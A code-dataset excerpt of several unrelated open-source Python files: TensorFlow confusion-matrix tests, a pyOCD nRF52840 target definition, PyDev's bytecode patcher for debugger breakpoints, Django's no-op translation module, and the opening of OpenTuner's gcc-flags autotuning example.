            labels_placeholder, predictions_placeholder, expected_rank_diff=1))
    expected_label_values = np.reshape(label_values, newshape=(2, 3))
    with self.cached_session():
      self.assertAllEqual(expected_label_values, self.evaluate(static_labels))
      self.assertAllEqual(prediction_values, self.evaluate(static_predictions))
      feed_dict = {
          labels_placeholder: label_values,
          predictions_placeholder: prediction_values
      }
      self.assertAllEqual(
          expected_label_values, dynamic_labels.eval(feed_dict=feed_dict))
      self.assertAllEqual(
          prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
  @test_util.run_deprecated_v1
  def testSqueezablePredictions(self):
    # Predictions have a trailing size-1 dim that should be squeezed away.
    label_values = np.ones(shape=(2, 3))
    prediction_values = np.zeros(shape=(2, 3, 1))
    static_labels, static_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            label_values, prediction_values))
    labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    dynamic_labels, dynamic_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            labels_placeholder, predictions_placeholder))
    expected_prediction_values = np.reshape(prediction_values, newshape=(2, 3))
    with self.cached_session():
      self.assertAllEqual(label_values, self.evaluate(static_labels))
      self.assertAllEqual(expected_prediction_values,
                          self.evaluate(static_predictions))
      feed_dict = {
          labels_placeholder: label_values,
          predictions_placeholder: prediction_values
      }
      self.assertAllEqual(
          label_values, dynamic_labels.eval(feed_dict=feed_dict))
      self.assertAllEqual(
          expected_prediction_values,
          dynamic_predictions.eval(feed_dict=feed_dict))
  @test_util.run_deprecated_v1
  def testSqueezablePredictionsExpectedRankDiffMinus1(self):
    label_values = np.ones(shape=(2, 3, 5))
    prediction_values = np.zeros(shape=(2, 3, 1))
    static_labels, static_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            label_values, prediction_values, expected_rank_diff=-1))
    labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    dynamic_labels, dynamic_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            labels_placeholder, predictions_placeholder, expected_rank_diff=-1))
    expected_prediction_values = np.reshape(prediction_values, newshape=(2, 3))
    with self.cached_session():
      self.assertAllEqual(label_values, self.evaluate(static_labels))
      self.assertAllEqual(expected_prediction_values,
                          self.evaluate(static_predictions))
      feed_dict = {
          labels_placeholder: label_values,
          predictions_placeholder: prediction_values
      }
      self.assertAllEqual(
          label_values, dynamic_labels.eval(feed_dict=feed_dict))
      self.assertAllEqual(
          expected_prediction_values,
          dynamic_predictions.eval(feed_dict=feed_dict))
  @test_util.run_deprecated_v1
  def testUnsqueezableLabels(self):
    # Trailing dim is size 2, so it must NOT be squeezed.
    label_values = np.ones(shape=(2, 3, 2))
    prediction_values = np.zeros(shape=(2, 3))
    labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    _, dynamic_predictions = (
        confusion_matrix.remove_squeezable_dimensions(labels_placeholder,
                                                      predictions_placeholder))
    with self.cached_session():
      feed_dict = {
          labels_placeholder: label_values,
          predictions_placeholder: prediction_values
      }
      self.assertAllEqual(
          prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
  @test_util.run_deprecated_v1
  def testUnsqueezablePredictions(self):
    label_values = np.ones(shape=(2, 3))
    prediction_values = np.zeros(shape=(2, 3, 2))
    labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    dynamic_labels, _ = (
        confusion_matrix.remove_squeezable_dimensions(labels_placeholder,
                                                      predictions_placeholder))
    with self.cached_session():
      feed_dict = {
          labels_placeholder: label_values,
          predictions_placeholder: prediction_values
      }
      self.assertAllEqual(
          label_values, dynamic_labels.eval(feed_dict=feed_dict))
# Standard TensorFlow test entry point: discovers and runs the TestCase
# classes defined in this file.
if __name__ == "__main__":
  test.main()
| apache-2.0 |
flit/pyOCD | pyocd/target/builtin/target_nRF52840_xxAA.py | 2 | 3222 | # pyOCD debugger
# Copyright (c) 2006-2013 Arm Limited
# Copyright (c) 2021 Chris Reed
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ...core.memory_map import (FlashRegion, RamRegion, MemoryMap)
from ...debug.svd.loader import SVDFile
from ..family.target_nRF52 import NRF52
# Flash programming algorithm: position-independent Thumb code that pyOCD
# loads into target RAM, plus the entry points and buffer layout needed to
# drive it (see the pyOCD flash-algo format).
FLASH_ALGO = { 'load_address' : 0x20000000,
               'instructions' : [
    0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
    0x47702000, 0x47702000, 0x4c26b570, 0x60602002, 0x60e02001, 0x68284d24, 0xd00207c0, 0x60602000,
    0xf000bd70, 0xe7f6f82c, 0x4c1eb570, 0x60612102, 0x4288491e, 0x2001d302, 0xe0006160, 0x4d1a60a0,
    0xf81df000, 0x07c06828, 0x2000d0fa, 0xbd706060, 0x4605b5f8, 0x4813088e, 0x46142101, 0x4f126041,
    0xc501cc01, 0x07c06838, 0x1e76d006, 0x480dd1f8, 0x60412100, 0xbdf84608, 0xf801f000, 0x480ce7f2,
    0x06006840, 0xd00b0e00, 0x6849490a, 0xd0072900, 0x4a0a4909, 0xd00007c3, 0x1d09600a, 0xd1f90840,
    0x00004770, 0x4001e500, 0x4001e400, 0x10001000, 0x40010400, 0x40010500, 0x40010600, 0x6e524635,
    0x00000000, ],
    # Entry points (RAM addresses, Thumb bit set).
    'pc_init' : 0x20000021,
    'pc_eraseAll' : 0x20000029,
    'pc_erase_sector' : 0x20000049,
    'pc_program_page' : 0x20000071,
    'begin_data' : 0x20002000, # Analyzer uses a max of 0.5 KB data (128 pages * 4 bytes / page)
    'page_buffers' : [0x20002000, 0x20003000], # Enable double buffering
    'begin_stack' : 0x20001000,
    'static_base' : 0x20000170,
    'min_program_length' : 4,
    'analyzer_supported' : True,
    'analyzer_address' : 0x20004000 # Analyzer 0x20004000..0x20004600
    }
class NRF52840(NRF52):
    """Nordic nRF52840-xxAA target: 1 MB code flash, 256 KB RAM, plus UICR."""
    MEMORY_MAP = MemoryMap(
        # Main code flash, 4 KB sectors.
        FlashRegion( start=0x0, length=0x100000, blocksize=0x1000, is_boot_memory=True,
            algo=FLASH_ALGO),
        # User Information Configuration Registers (UICR) as a flash region
        FlashRegion( start=0x10001000, length=0x400, blocksize=0x400, is_testable=False,
            algo=FLASH_ALGO),
        RamRegion( start=0x20000000, length=0x40000)
        )
    def __init__(self, session):
        # Family base class handles the nRF52-specific connect/unlock logic.
        super(NRF52840, self).__init__(session, self.MEMORY_MAP)
    def resetn(self):
        """Reset the core; after this call the core is left running."""
        self.reset()
| apache-2.0 |
JetBrains/intellij-community | python/helpers/pydev/_pydevd_frame_eval/pydevd_modify_bytecode.py | 12 | 13454 | import dis
import sys
import traceback
from collections import namedtuple
from opcode import opmap, EXTENDED_ARG, HAVE_ARGUMENT
from types import CodeType
# Largest value a bytecode instruction's single argument byte can hold;
# anything bigger needs an EXTENDED_ARG prefix instruction.
MAX_BYTE = 255
# Size in bytes of one instruction (opcode + oparg) in CPython 3.6+ wordcode;
# used to strip the trailing RETURN_VALUE from code being injected.
RETURN_VALUE_SIZE = 2
def _add_attr_values_from_insert_to_original(original_code, insert_code, insert_code_list, attribute_name, op_list):
    """
    This function appends values of the attribute `attribute_name` of the inserted code to the original values,
    and changes indexes inside inserted code. If some bytecode instruction in the inserted code used to call argument
    number i, after modification it calls argument n + i, where n - length of the values in the original code.
    So it helps to avoid variables mixing between two pieces of code.

    :param original_code: code to modify
    :param insert_code: code to insert
    :param insert_code_list: list of bytecode bytes (ints) of the inserted code, which should be modified too
    :param attribute_name: name of attribute to modify ('co_names', 'co_consts' or 'co_varnames')
    :param op_list: sequence of bytecodes whose arguments should be changed
    :return: modified bytes sequence of the code to insert and new values of the attribute `attribute_name` for
    original code
    """
    orig_value = getattr(original_code, attribute_name)
    insert_value = getattr(insert_code, attribute_name)
    # The inserted code's tuple entries are appended after the original's, so
    # every renumbered arg is shifted by the original tuple's length.
    orig_names_len = len(orig_value)
    code_with_new_values = list(insert_code_list)
    offset = 0
    while offset < len(code_with_new_values):
        op = code_with_new_values[offset]
        if op in op_list:
            new_val = code_with_new_values[offset + 1] + orig_names_len
            if new_val > MAX_BYTE:
                # Shifted arg no longer fits in one byte: keep the low byte in
                # place and prepend an EXTENDED_ARG carrying the high byte.
                code_with_new_values[offset + 1] = new_val & MAX_BYTE
                code_with_new_values = code_with_new_values[:offset] + [EXTENDED_ARG, new_val >> 8] + \
                                       code_with_new_values[offset:]
                # Step over the just-inserted EXTENDED_ARG pair; the trailing
                # `offset += 2` below then steps over the instruction itself.
                offset += 2
            else:
                code_with_new_values[offset + 1] = new_val
        offset += 2
    new_values = orig_value + insert_value
    return bytes(code_with_new_values), new_values
def _modify_new_lines(code_to_modify, all_inserted_code):
    """
    Generate a new bytecode instruction to line number mapping aka ``lnotab`` after injecting the debugger specific code.

    Note, that the bytecode inserted should be the last instruction of the line preceding a line with the breakpoint.

    :param code_to_modify: the original code in which we injected new instructions.
    :type code_to_modify: :py:class:`types.CodeType`
    :param all_inserted_code: a list of modifications done. Each modification is given as a named tuple with
    the first field ``offset`` which is the instruction offset and ``code_list`` which is the list of instructions
    have been injected.
    :type all_inserted_code: list
    :return: bytes sequence of code with updated lines offsets which can be passed as the ``lnotab`` parameter of the
    :py:class:`types.CodeType` constructor, or ``None`` when the caller should fall back to tracing.
    """
    # There's a nice overview of co_lnotab in
    # https://github.com/python/cpython/blob/3.6/Objects/lnotab_notes.txt
    if code_to_modify.co_firstlineno == 1 and len(all_inserted_code) > 0 and all_inserted_code[0].offset == 0 \
            and code_to_modify.co_name == '<module>':
        # There's a peculiarity here: if a breakpoint is added in the first line of a module, we
        # can't replace the code because we require a line event to stop and the live event
        # was already generated, so, fallback to tracing.
        return None
    new_list = list(code_to_modify.co_lnotab)
    if not new_list:
        # Could happen on a lambda (in this case, a breakpoint in the lambda should fallback to
        # tracing).
        return None
    byte_increments = code_to_modify.co_lnotab[0::2]
    line_increments = code_to_modify.co_lnotab[1::2]
    all_inserted_code = sorted(all_inserted_code, key=lambda x: x.offset)
    # As all numbers are relative, what we want is to hide the code we inserted in the previous line
    # (it should be the last thing right before we increment the line so that we have a line event
    # right after the inserted code).
    addr = 0
    it = zip(byte_increments, line_increments)
    # k: next injection to account for; inserted_so_far: injected bytes already
    # attributed to earlier entries (injection offsets are post-insertion).
    k = inserted_so_far = 0
    for i, (byte_incr, _line_incr) in enumerate(it):
        addr += byte_incr
        if addr == (all_inserted_code[k].offset - inserted_so_far):
            bytecode_delta = len(all_inserted_code[k].code_list)
            inserted_so_far += bytecode_delta
            # NOTE(review): lnotab byte increments are single bytes; this can
            # exceed 255 for a large injected chunk -- presumably injected
            # snippets stay small. TODO confirm.
            new_list[i * 2] += bytecode_delta
            k += 1
            if k >= len(all_inserted_code):
                break
    return bytes(new_list)
def _unpack_opargs(code, inserted_code_list, current_index):
"""
Modified version of `_unpack_opargs` function from module `dis`.
We have to use it, because sometimes code can be in an inconsistent state: if EXTENDED_ARG
operator was introduced into the code, but it hasn't been inserted into `code_list` yet.
In this case we can't use standard `_unpack_opargs` and we should check whether there are
some new operators in `inserted_code_list`.
"""
extended_arg = 0
for i in range(0, len(code), 2):
op = code[i]
if op >= HAVE_ARGUMENT:
if not extended_arg:
# in case if we added EXTENDED_ARG, but haven't inserted it to the source code yet.
for code_index in range(current_index, len(inserted_code_list)):
inserted_offset, inserted_code = inserted_code_list[code_index]
if inserted_offset == i and inserted_code[0] == EXTENDED_ARG:
extended_arg = inserted_code[1] << 8
arg = code[i + 1] | extended_arg
extended_arg = (arg << 8) if op == EXTENDED_ARG else 0
else:
arg = None
yield (i, op, arg)
def _update_label_offsets(code_obj, breakpoint_offset, breakpoint_code_list):
    """
    Update labels for the relative and absolute jump targets

    :param code_obj: code to modify
    :param breakpoint_offset: offset for the inserted code
    :param breakpoint_code_list: list of bytes to insert
    :return: bytes sequence with modified labels; list of named tuples (resulting offset, list of code instructions) with
    information about all inserted pieces of code
    """
    all_inserted_code = list()
    InsertedCode = namedtuple('InsertedCode', ['offset', 'code_list'])
    # the list with all inserted pieces of code
    all_inserted_code.append(InsertedCode(breakpoint_offset, breakpoint_code_list))
    code_list = list(code_obj)
    j = 0
    # Work-list loop: fixing the jumps for one inserted chunk may itself force
    # new EXTENDED_ARG chunks to be inserted, which are appended to
    # `all_inserted_code` and processed on later iterations.
    while j < len(all_inserted_code):
        current_offset, current_code_list = all_inserted_code[j]
        offsets_for_modification = []
        # We iterate through the code, find all the jump instructions and update the labels they are pointing to.
        # There is no reason to update anything other than jumps because only jumps are affected by code injections.
        for offset, op, arg in _unpack_opargs(code_list, all_inserted_code, j):
            if arg is not None:
                if op in dis.hasjrel:
                    # has relative jump target
                    label = offset + 2 + arg
                    # reminder: current offset is the place where we inject code
                    if offset < current_offset < label:
                        # change labels for relative jump targets if code was inserted between the instruction and the jump label
                        offsets_for_modification.append(offset)
                elif op in dis.hasjabs:
                    # change label for absolute jump if code was inserted before it
                    if current_offset < arg:
                        offsets_for_modification.append(offset)
        for i in offsets_for_modification:
            op = code_list[i]
            if op >= dis.HAVE_ARGUMENT:
                new_arg = code_list[i + 1] + len(current_code_list)
                if new_arg <= MAX_BYTE:
                    code_list[i + 1] = new_arg
                else:
                    # handle bytes overflow
                    # NOTE(review): `i - 2 > 0` looks like it should be
                    # `i - 2 >= 0` -- an EXTENDED_ARG at offset 0 is not
                    # detected and a second one would be inserted. TODO confirm.
                    if i - 2 > 0 and code_list[i - 2] == EXTENDED_ARG and code_list[i - 1] < MAX_BYTE:
                        # if new argument > 255 and EXTENDED_ARG already exists we need to increase it's argument
                        code_list[i - 1] += 1
                    else:
                        # if there isn't EXTENDED_ARG operator yet we have to insert the new operator
                        extended_arg_code = [EXTENDED_ARG, new_arg >> 8]
                        all_inserted_code.append(InsertedCode(i, extended_arg_code))
                        code_list[i + 1] = new_arg & MAX_BYTE
        # Splice the current chunk in, then shift the recorded offsets of every
        # pending insertion that lies after the splice point.
        code_list = code_list[:current_offset] + current_code_list + code_list[current_offset:]
        for k in range(len(all_inserted_code)):
            offset, inserted_code_list = all_inserted_code[k]
            if current_offset < offset:
                all_inserted_code[k] = InsertedCode(offset + len(current_code_list), inserted_code_list)
        j += 1
    return bytes(code_list), all_inserted_code
def _return_none_fun():
    # Template function: compiled so its trivial bytecode (load None, return)
    # can be harvested when building injected code -- presumably never called
    # for its value. TODO(review): confirm against callers outside this chunk.
    return None
def add_jump_instruction(jump_arg, code_to_insert):
    """Return ``code_to_insert``'s bytecode as a list of ints with the trailing
    RETURN_VALUE replaced by a POP_JUMP_IF_TRUE to ``jump_arg`` (prefixed with
    EXTENDED_ARG when the target does not fit in one byte).

    Note: although it's adding a POP_JUMP_IF_TRUE, it's actually no longer used
    now (we could only return the return and possibly the load of the 'None'
    before the return -- not done yet because it needs work to fix all related
    tests).
    """
    # Drop the final RETURN_VALUE instruction of the code being injected.
    result = list(code_to_insert.co_code[:-RETURN_VALUE_SIZE])
    if jump_arg > MAX_BYTE:
        # Target offset overflows one byte: emit the high byte via EXTENDED_ARG.
        result.extend([EXTENDED_ARG, jump_arg >> 8])
        jump_arg &= MAX_BYTE
    result.append(opmap['POP_JUMP_IF_TRUE'])
    result.append(jump_arg)
    return result
# Maps already-processed code objects to (success, line). Generator frames
# resume with the *old* code object after every yield, so we must remember
# what was already done instead of re-patching the same code.
_created = {}
def insert_code(code_to_modify, code_to_insert, before_line):
    """Patch ``code_to_insert`` into ``code_to_modify`` before ``before_line``,
    memoized per code object.

    Returns ``(success, code)``; on a cache hit the code object is returned
    unchanged and success is only reported when the earlier, successful patch
    targeted the exact same line.
    """
    cached = _created.get(code_to_modify)
    if cached is not None:
        was_ok, patched_line = cached
        return (was_ok and patched_line == before_line), code_to_modify
    ok, new_code = _insert_code(code_to_modify, code_to_insert, before_line)
    _created[new_code] = ok, before_line
    return ok, new_code
def _insert_code(code_to_modify, code_to_insert, before_line):
    """
    Insert piece of code `code_to_insert` to `code_to_modify` right inside the line `before_line` before the
    instruction on this line by modifying original bytecode

    :param code_to_modify: Code to modify
    :param code_to_insert: Code to insert
    :param before_line: Number of line for code insertion
    :return: boolean flag whether insertion was successful, modified code
    """
    linestarts = dict(dis.findlinestarts(code_to_modify))
    if before_line not in linestarts.values():
        # The requested line never starts an instruction run -- nothing to patch.
        return False, code_to_modify
    offset = None
    for off, line_no in linestarts.items():
        if line_no == before_line:
            offset = off
            break
    # Replace the insert's trailing RETURN_VALUE with a jump back to the
    # instruction that originally started the target line.
    code_to_insert_list = add_jump_instruction(offset, code_to_insert)
    try:
        # Merge the insert's names/consts/varnames into the original tuples and
        # renumber the insert's instruction arguments accordingly.
        code_to_insert_list, new_names = \
            _add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_names',
                                                     dis.hasname)
        code_to_insert_list, new_consts = \
            _add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_consts',
                                                     [opmap['LOAD_CONST']])
        code_to_insert_list, new_vars = \
            _add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_varnames',
                                                     dis.haslocal)
        new_bytes, all_inserted_code = _update_label_offsets(code_to_modify.co_code, offset, list(code_to_insert_list))
        new_lnotab = _modify_new_lines(code_to_modify, all_inserted_code)
        if new_lnotab is None:
            # No consistent line table possible (module first line / lambda);
            # the caller falls back to tracing instead of bytecode patching.
            return False, code_to_modify
    except ValueError:
        traceback.print_exc()
        return False, code_to_modify
    # Positional CodeType arguments; order matters.
    # NOTE(review): this co_lnotab-based layout matches CPython <= 3.9 (with
    # the 3.8 posonlyargcount insertion below); 3.10+ replaced co_lnotab with
    # co_linetable -- presumably this module only runs on older interpreters.
    args = [
        code_to_modify.co_argcount,  # integer
        code_to_modify.co_kwonlyargcount,  # integer
        len(new_vars),  # integer
        code_to_modify.co_stacksize,  # integer
        code_to_modify.co_flags,  # integer
        new_bytes,  # bytes
        new_consts,  # tuple
        new_names,  # tuple
        new_vars,  # tuple
        code_to_modify.co_filename,  # string
        code_to_modify.co_name,  # string
        code_to_modify.co_firstlineno,  # integer
        new_lnotab,  # bytes
        code_to_modify.co_freevars,  # tuple
        code_to_modify.co_cellvars  # tuple
    ]
    if sys.version_info >= (3, 8, 0):
        # Python 3.8 and above supports positional-only parameters. The number of such
        # parameters is passed to the constructor as the second argument.
        args.insert(1, code_to_modify.co_posonlyargcount)
    new_code = CodeType(*args)
    return True, new_code
| apache-2.0 |
django-nonrel/django-nonrel | django/utils/translation/trans_null.py | 241 | 2648 | # These are versions of the functions in django.utils.translation.trans_real
# that don't actually do anything. This is purely for performance, so that
# settings.USE_I18N = False can use this module rather than trans_real.py.
import warnings
from django.conf import settings
from django.utils.encoding import force_unicode
from django.utils.safestring import mark_safe, SafeData
def ngettext(singular, plural, number):
    """Return `singular` for a count of exactly 1, `plural` otherwise."""
    return singular if number == 1 else plural
# With translation disabled there is nothing to defer, so the lazy variant is
# simply the plain function.
ngettext_lazy = ngettext
def ungettext(singular, plural, number):
    """Unicode counterpart of ngettext(): same word choice, coerced to text."""
    chosen = ngettext(singular, plural, number)
    return force_unicode(chosen)
def pgettext(context, message):
    # `context` only disambiguates real catalog lookups; with I18N disabled we
    # simply defer to the no-op ugettext().
    return ugettext(message)
def npgettext(context, singular, plural, number):
    # Contextual plural lookup degrades to the plain no-op ungettext().
    return ungettext(singular, plural, number)
# No-op stand-ins for the real translation machinery. Written as ``def``s
# rather than lambdas assigned to names (PEP 8, E731): behavior is identical,
# but the functions get useful __name__s in tracebacks/introspection.
def activate(x):
    """Accept and ignore a language code; translation is disabled."""
    return None
def deactivate():
    """No-op: there is no active translation to deactivate."""
    return None
# Deactivating "all" is the same no-op when USE_I18N is off; keep both names
# bound to the same callable, as the original lambda assignment did.
deactivate_all = deactivate
def get_language():
    """Always report the project's configured LANGUAGE_CODE."""
    return settings.LANGUAGE_CODE
def get_language_bidi():
    """True when the configured language is listed in LANGUAGES_BIDI."""
    return settings.LANGUAGE_CODE in settings.LANGUAGES_BIDI
def check_for_language(x):
    """Every language "exists" when translation is disabled."""
    return True
# Date formats shouldn't be looked up through gettext anymore. This mapping of
# legacy "technical ids" to the settings-based formats is kept only for
# backward compatibility.
TECHNICAL_ID_MAP = {
    "DATE_WITH_TIME_FULL": settings.DATETIME_FORMAT,
    "DATE_FORMAT": settings.DATE_FORMAT,
    "DATETIME_FORMAT": settings.DATETIME_FORMAT,
    "TIME_FORMAT": settings.TIME_FORMAT,
    "YEAR_MONTH_FORMAT": settings.YEAR_MONTH_FORMAT,
    "MONTH_DAY_FORMAT": settings.MONTH_DAY_FORMAT,
}
def gettext(message):
    """Identity "translation": map legacy technical ids to their configured
    format strings and pass everything else through, preserving safeness."""
    looked_up = TECHNICAL_ID_MAP.get(message, message)
    # A safe input string must not lose its safe marking on the way out.
    return mark_safe(looked_up) if isinstance(message, SafeData) else looked_up
def ugettext(message):
    """Like gettext(), but force the result to unicode."""
    translated = gettext(message)
    return force_unicode(translated)
gettext_noop = gettext_lazy = _ = gettext
def to_locale(language):
    """Turn a language name like 'en-us' into a locale name like 'en_US'."""
    lang, dash, region = language.partition('-')
    if not dash:
        # No region part at all -- just lowercase the language name.
        return language.lower()
    # Only the first dash splits language from region; the rest of the string
    # (including any further dashes) is uppercased wholesale.
    return lang.lower() + '_' + region.upper()
def get_language_from_request(request):
    # `request` is accepted only for API compatibility with trans_real and is
    # ignored: with USE_I18N off the configured LANGUAGE_CODE always wins.
    return settings.LANGUAGE_CODE
# get_date_formats and get_partial_date_formats aren't used anymore by Django
# but are kept for backward compatibility.
def get_date_formats():
    # Deprecated shim: warn, then return the settings-configured formats.
    warnings.warn(
        '`django.utils.translation.get_date_formats` is deprecated. '
        'Please update your code to use the new i18n aware formatting.',
        DeprecationWarning
    )
    return settings.DATE_FORMAT, settings.DATETIME_FORMAT, settings.TIME_FORMAT
def get_partial_date_formats():
    # Deprecated shim: warn, then return the settings-configured formats.
    warnings.warn(
        '`django.utils.translation.get_partial_date_formats` is deprecated. '
        'Please update your code to use the new i18n aware formatting.',
        DeprecationWarning
    )
    return settings.YEAR_MONTH_FORMAT, settings.MONTH_DAY_FORMAT
| bsd-3-clause |
ucb-sejits/opentuner | examples/gccflags/gccflags.py | 6 | 16150 | #!/usr/bin/env python
import adddeps # fix sys.path
import math
import argparse
import ast
import collections
import json
import logging
import opentuner
import os
import random
import re
import shutil
import subprocess
import sys
from opentuner.resultsdb.models import Result, TuningRun
from opentuner.search import manipulator
# Cache files so repeated runs do not have to re-probe the compiler.
FLAGS_WORKING_CACHE_FILE = 'cc_flags.json'
PARAMS_DEFAULTS_CACHE_FILE = 'cc_param_defaults.json'
# gcc source location, only needed to rebuild the params-defaults cache.
PARAMS_DEF_PATH = '~/gcc-4.9.0/gcc/params.def'
PARAMS_WORKING_CACHE_FILE = 'cc_params.json'
log = logging.getLogger('gccflags')
# Command line interface; the parsed result is stored in the module-global
# ``args`` (assigned in __main__) and read throughout this module.
argparser = argparse.ArgumentParser(parents=opentuner.argparsers())
argparser.add_argument('source', help='source file to compile')
argparser.add_argument('--compile-template',
                       default='{cc} {source} -o {output} -lpthread {flags}',
                       help='command to compile {source} into {output} with'
                            ' {flags}')
argparser.add_argument('--compile-limit', type=float, default=30,
                       help='kill gcc if it runs more than {default} sec')
argparser.add_argument('--scaler', type=int, default=4,
                       help='by what factor to try increasing parameters')
argparser.add_argument('--cc', default='g++', help='g++ or gcc')
argparser.add_argument('--output', default='./tmp.bin',
                       help='temporary file for compiler to write to')
argparser.add_argument('--debug', action='store_true',
                       help='on gcc errors try to find minimal set '
                            'of args to reproduce error')
argparser.add_argument('--force-killall', action='store_true',
                       help='killall cc1plus before each collection')
argparser.add_argument('--memory-limit', default=1024 ** 3, type=int,
                       help='memory limit for child process')
argparser.add_argument('--no-cached-flags', action='store_true',
                       help='regenerate the lists of legal flags each time')
argparser.add_argument('--flags-histogram', action='store_true',
                       help='print out a histogram of flags')
argparser.add_argument('--flag-importance',
                       help='Test the importance of different flags from a '
                            'given json file.')
class GccFlagsTuner(opentuner.measurement.MeasurementInterface):
  """OpenTuner measurement driver that searches gcc/g++ optimization flags.

  A configuration combines an -O level, individual -f flags set to
  on/off/default, and numeric --param values; quality is the wall-clock run
  time of the compiled binary.  NOTE(review): this class (and the helpers
  below) read the module-global ``args`` set by argparse in __main__.
  """
  def __init__(self, *pargs, **kwargs):
    super(GccFlagsTuner, self).__init__(program_name=args.source, *pargs,
                                        **kwargs)
    # Probe the local compiler once so the search space only contains
    # flags and params this gcc version actually accepts.
    self.gcc_version = self.extract_gcc_version()
    self.cc_flags = self.extract_working_flags()
    self.cc_param_defaults = self.extract_param_defaults()
    self.cc_params = self.extract_working_params()
    # these bugs are hardcoded for now
    # sets of options which causes gcc to barf
    if True:
      # These bugs were for gcc 4.7 on ubuntu
      self.cc_bugs = (['-fipa-matrix-reorg', '-fwhole-program'],
                      ['-fno-tree-coalesce-inlined-vars'],
                      ['-fno-inline-atomics'],
                      ['-ftoplevel-reorder', '-fno-unit-at-a-time'])
    else:
      # Bugs for gcc 4.9 (work in progress, incomplete list)
      self.cc_bugs = (['-ftoplevel-reorder', '-fno-unit-at-a-time'], )
    self.result_list = {}
    self.parallel_compile = True
    # EAFP directory creation for the scratch area used by get_tmpdir().
    try:
      os.stat('./tmp')
    except OSError:
      os.mkdir('./tmp')
    self.run_baselines()
  def run_baselines(self):
    """Log the performance of plain -O0..-O3 as reference points."""
    log.info("baseline perfs -O0=%.4f -O1=%.4f -O2=%.4f -O3=%.4f",
             *[self.run_with_flags(['-O%d' % i], None).time
               for i in range(4)])
  def extract_gcc_version(self):
    """Return the compiler version as an (int, int, int) tuple, or None."""
    m = re.search(r'([0-9]+)[.]([0-9]+)[.]([0-9]+)', subprocess.check_output([
      self.args.cc, '--version']))
    if m:
      gcc_version = tuple(map(int, m.group(1, 2, 3)))
    else:
      gcc_version = None
    log.debug('gcc version %s', gcc_version)
    return gcc_version
  def extract_working_flags(self):
    """
    Figure out which gcc flags work (don't cause gcc to barf) by running
    each one.
    """
    if os.path.isfile(FLAGS_WORKING_CACHE_FILE) and not args.no_cached_flags:
      # use cached version
      found_cc_flags = json.load(open(FLAGS_WORKING_CACHE_FILE))
    else:
      # extract flags from --help=optimizers
      optimizers, err = subprocess.Popen([self.args.cc, '--help=optimizers'],
                                         stdout=subprocess.PIPE).communicate()
      found_cc_flags = re.findall(r'^  (-f[a-z0-9-]+) ', optimizers,
                                  re.MULTILINE)
      log.info('Determining which of %s possible gcc flags work',
               len(found_cc_flags))
      found_cc_flags = filter(self.check_if_flag_works, found_cc_flags)
      json.dump(found_cc_flags, open(FLAGS_WORKING_CACHE_FILE, 'w'))
    return found_cc_flags
  def extract_param_defaults(self):
    """
    Get the default, minimum, and maximum for each gcc parameter.
    Requires source code for gcc to be in your home directory.
    This example ships with a cached version so it does not require source.
    """
    if os.path.isfile(PARAMS_DEFAULTS_CACHE_FILE) and not args.no_cached_flags:
      # use cached version
      param_defaults = json.load(open(PARAMS_DEFAULTS_CACHE_FILE))
    else:
      # default values of params need to be extracted from source code,
      # since they are not in --help
      param_defaults = dict()
      params_def = open(os.path.expanduser(PARAMS_DEF_PATH)).read()
      for m in re.finditer(r'DEFPARAM *\((([^")]|"[^"]*")*)\)', params_def):
        param_def_str = (m.group(1)
                         # Hacks!!!
                         .replace('GGC_MIN_EXPAND_DEFAULT', '30')
                         .replace('GGC_MIN_HEAPSIZE_DEFAULT', '4096')
                         .replace('50 * 1024 * 1024', '52428800'))
        try:
          # DEFPARAM bodies are close enough to Python literals to parse
          # with ast.literal_eval after wrapping them in a list.
          name, desc, default, param_min, param_max = ast.literal_eval(
            '[' + param_def_str.split(',', 1)[1] + ']')
          param_defaults[name] = {'default': default,
                                  'min': param_min,
                                  'max': param_max}
        except:
          # NOTE(review): bare except silently tolerates any malformed entry.
          log.exception("error with %s", param_def_str)
      json.dump(param_defaults, open(PARAMS_DEFAULTS_CACHE_FILE, 'w'))
    return param_defaults
  def extract_working_params(self):
    """
    Figure out which gcc params work (don't cause gcc to barf) by running
    each one to test.
    """
    params, err = subprocess.Popen(
      [self.args.cc, '--help=params'], stdout=subprocess.PIPE).communicate()
    all_params = re.findall(r'^  ([a-z0-9-]+) ', params, re.MULTILINE)
    # Only keep params whose defaults we know, so bounds can be set later.
    all_params = sorted(set(all_params) &
                        set(self.cc_param_defaults.keys()))
    if os.path.isfile(PARAMS_WORKING_CACHE_FILE) and not args.no_cached_flags:
      # use cached version
      return json.load(open(PARAMS_WORKING_CACHE_FILE))
    else:
      log.info('Determining which of %s possible gcc params work',
               len(all_params))
      working_params = []
      for param in all_params:
        if self.check_if_flag_works('--param={}={}'.format(
            param, self.cc_param_defaults[param]['default'])):
          working_params.append(param)
      json.dump(working_params, open(PARAMS_WORKING_CACHE_FILE, 'w'))
    return working_params
  def check_if_flag_works(self, flag, try_inverted=True):
    """Return True if compiling with ``flag`` (and its -fno- inverse) works."""
